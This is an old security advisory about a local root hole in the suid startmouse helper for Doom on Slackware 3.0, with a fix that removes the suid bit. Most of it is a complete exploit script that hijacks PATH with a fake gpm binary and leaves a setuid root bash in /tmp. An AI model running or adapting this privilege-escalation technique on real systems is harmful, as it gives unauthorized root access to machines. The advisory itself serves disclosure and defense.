COMMAND

    doom (startmouse)

SYSTEMS AFFECTED

    Linux Slackware 3.0

PROBLEM

    Cristian Varvas has  found a security  hole in startmouse  on Doom
    (Slack 3.0).  He made an exploit.

    This  exploit  works  if  you have /usr/games/doom/startmouse with
    suid-flag.

	---begin

	#!/bin/sh
	export PATH=/tmp:$PATH
	#                       (c)1997 by jolly@utcluj.ro
	#
	echo '#include <stdio.h>                                         '>>/tmp/gpm.c
	echo 'void main()                                               '>>/tmp/gpm.c
	echo '{                                                         '>>/tmp/gpm.c
	echo '   seteuid(0,0);                                          '>>/tmp/gpm.c
	echo '   system("cp /bin/bash /tmp/setuid.bash");               '>>/tmp/gpm.c
	echo '   system("chmod 4755 /tmp/setuid.bash");                 '>>/tmp/gpm.c
	echo '}                                                         '>>/tmp/gpm.c
	#
	cc -o /tmp/gpm /tmp/gpm.c
	/usr/bin/doom
	rm /tmp/gpm.c /tmp/gpm
	sleep 5
	/tmp/setuid.bash

	---end

SOLUTION

    Just remove SUID bit.  Well, remove this stupid program anyway.

	chmod 755 /usr/games/doom/startmouse